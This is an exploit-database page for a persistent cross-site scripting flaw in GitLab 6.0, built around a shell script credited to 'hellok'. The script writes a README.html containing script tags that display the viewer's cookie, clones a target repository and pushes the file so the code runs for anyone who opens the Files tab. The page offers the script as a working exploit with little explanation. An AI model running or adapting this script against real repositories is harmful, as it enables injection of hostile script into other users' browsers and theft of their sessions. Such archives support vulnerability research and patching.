Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Gitlab 6.0 - Persistent XSS

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 29 Views

Gitlab 6.0 Persistent XSS exploit via README.html generatio

Code

                                                ##Exploit-DB note: Tested commit 10b0b8f1797e6c09b4c063c04a4864ecd31d34f4

# Exploit Title: [gitlab persistent xss exploit]
# Date: [12/16/2013]
# Exploit Author: [hellok]
# Vendor Homepage: gitlab.org


#!/bin/sh
#author hellok
#for file format ext pwn for gitlab 12/16/2013


tee README.html > /dev/null <<'EOF'
<!-- Markdown Source -->
<!--
-->
<html>
<head>
<title>README. [Generated]</title>
<style>

/* Taken from QLMarkdown: https://github.com/toland/qlmarkdown */
/* Extracted and interpreted from adcstyle.css and frameset_styles.css */

/* body */
body {
margin: 20px 40px;
background-color: #fff;
color: #000;
font: 13px "Myriad Pro", "Lucida Grande", Lucida, Verdana, sans-serif;
}

/* links */
a:link {
color: #00f;
text-decoration: none;
}

a:visited {
color: #00a;
text-decoration: none;
}

a:hover {
color: #f60;
text-decoration: underline;
}

a:active {
color: #f60;
text-decoration: underline;
}


/* html tags */

/*  Work around IE/Win code size bug - courtesy Jesper, waffle.wootest.net  */

* html code	{
font-size: 101%;
}

* html pre {
font-size: 101%;
}

/* code */

pre, code {
font-size: 11px; font-family: monaco, courier, consolas, monospace;
}

pre {
margin-top: 5px;
margin-bottom: 10px;
border: 1px solid #c7cfd5;
background: #f1f5f9;
margin: 20px 0;
padding: 8px;
text-align: left;
}

hr {
color: #919699;
size: 1;
width: 100%;
noshade: "noshade"
}

/* headers */


h1, h2, h3, h4, h5, h6 {
font-family: "Myriad Pro", "Lucida Grande", Lucida, Verdana, sans-serif;
font-weight: bold;
}

h1	{
margin-top: 1em;
margin-bottom: 25px;
color: #000;
font-weight: bold;
font-size: 30px;
}
h2	{
margin-top: 2.5em;
font-size: 24px;
color: #000;
padding-bottom: 2px;
border-bottom: 1px solid #919699;
}
h3	{
margin-top: 2em;
margin-bottom: .5em;
font-size: 17px;
color: #000;
}
h4	{
margin-top: 2em;
margin-bottom: .5em;
font-size: 15px;
color: #000;
}
h5	{
margin-top: 20px;
margin-bottom: .5em;
padding: 0;
font-size: 13px;
color: #000;
}

h6	{
margin-top: 20px;
margin-bottom: .5em;
padding: 0;
font-size: 11px;
color: #000;
}

p {
margin-top: 0px;
margin-bottom: 10px;
}

/* lists */

ul	{
list-style: square outside;
margin: 0 0 0 30px;
padding: 0 0 12px 6px;
}

li	{
margin-top: 7px;
}

ol {
list-style-type: decimal;
list-style-position: outside;
margin: 0 0 0 30px;
padding: 0 0 12px 6px;
}

ol ol {
list-style-type: lower-alpha;
list-style-position: outside;
margin: 7px 0 0 30px;
padding: 0 0 0 10px;
}

ul ul {
margin-left: 40px;
padding: 0 0 0 6px;
}

li>p { display: inline }
li>p+p { display: block }
li>a+p { display: block }


/* table */

table {
border-top: 1px solid #919699;
border-left: 1px solid #919699;
border-spacing: 0;
}

table th {
padding: 4px 8px 4px 8px;
background: #E2E2E2;
font-size: 12px;
border-bottom: 1px solid #919699;
border-right: 1px solid #919699;
}
table th p {
font-weight: bold;
margin-bottom: 0px;
}

table td {
padding: 8px;
font-size: 12px;
vertical-align: top;
border-bottom: 1px solid #919699;
border-right: 1px solid #919699;
}
table td p {
margin-bottom: 0px;
}
table td p + p  {
margin-top: 5px;
}
table td p + p + p {
margin-top: 5px;
}

/* forms */

form {
margin: 0;
}

button {
margin: 3px 0 10px 0;
}
input {
vertical-align: middle;
padding: 0;
margin: 0 0 5px 0;
}

select {
vertical-align: middle;
padding: 0;
margin: 0 0 3px 0;
}

textarea {
margin: 0 0 10px 0;
width: 100%;
}
</style>
</head>
<body>
<b>README.</b> - Generated on <b>2013年12月 16日 星期日 16时50分57秒 CST</b> by <b>hellok</b> using <a href="">Markdown</a>. Source is embedded.
<hr>

</body>
<script>alert(/pwned by hellok,fresh cookie/)</script>
<script>alert(document.cookie)</script>
</html>
EOF


USAGE="$0: <git url>"
if [ $# -lt 1 ]; then echo -e "Error: git url is required.\n$USAGE" >&2; exit 1; fi
echo "pwn start"
git clone $1
echo $(basename $1 | awk -F "." '{ print $1 }')
cp README.html $(basename $1 | awk -F "." '{ print $1 "/"}')
cd $(basename $1 | awk -F "." '{ print $1 }')
git add *
git commit -m "1"
git push
echo "DONE! Open your gitlab's Files TAB"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
gitlabpersistent xssexploitreadme.htmlsecurityvulnerability
29